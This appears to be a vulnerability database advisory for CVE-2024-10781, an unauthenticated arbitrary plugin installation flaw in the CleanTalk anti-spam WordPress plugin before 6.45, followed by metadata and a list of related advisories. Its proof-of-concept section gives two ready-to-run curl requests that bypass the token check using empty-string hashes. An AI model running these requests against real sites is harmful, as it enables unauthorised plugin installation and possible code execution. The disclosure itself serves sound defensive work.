Spam protection, Anti-Spam, FireWall by CleanTalk < 6.45 – Unauthenticated Arbitrary Plugin Installation | CVE 2024-10781 | Plugin Vulnerabilities

Description

The plugin is vulnerable to unauthorized Arbitrary Plugin Installation due to a missing empty value check on the 'api_key' value in the 'perform' function. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.

Proof of Concept

curl --url 'http://vulnerable-site.tld/?spbc_remote_call_token=d41d8cd98f00b204e9800998ecf8427e&spbc_remote_call_action=install_plugin&plugin_name=antispam&plugin=jetpack/jetpack.php'

curl --url 'http://vulnerable-site.tld/?spbc_remote_call_token=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855&spbc_remote_call_action=install_plugin&plugin_name=antispam&plugin=jetpack/jetpack.php'

Affects Plugins

cleantalk-spam-protect

Fixed in 6.45

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/79ae062c-b084-4045-9407-2d94919993af

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

István Márton

Verified

No

WPVDB ID

9e4870eb-cbcb-4a2a-bf4f-d4610f2afeca

Timeline

Publicly Published

2024-11-25 (about 1 year ago)

Added

2024-12-02 (about 1 year ago)

Last Updated

2026-06-09 (about 3 hours ago)

Other

Published

Title

Published

2023-01-10

Title

Royal Elementor Addons < 1.3.60 - Subscriber+ Arbitrary Template Activation

Published

2025-03-11

Title

Block Spam By Math Reloaded <= 2.2.4 - Missing Authorization

Published

2026-01-27

Title

Database for Contact Form 7, WPforms, Elementor forms < 1.4.6 - Missing Authorization to Unauthenticated Form Data Exfiltration via CSV Export

Published

2025-04-01

Title

Ship Per Product <= 2.1.0 - Missing Authorization

Published

2026-03-23

Title

PPWP – Password Protect Pages < 1.9.16 - Missing Authorization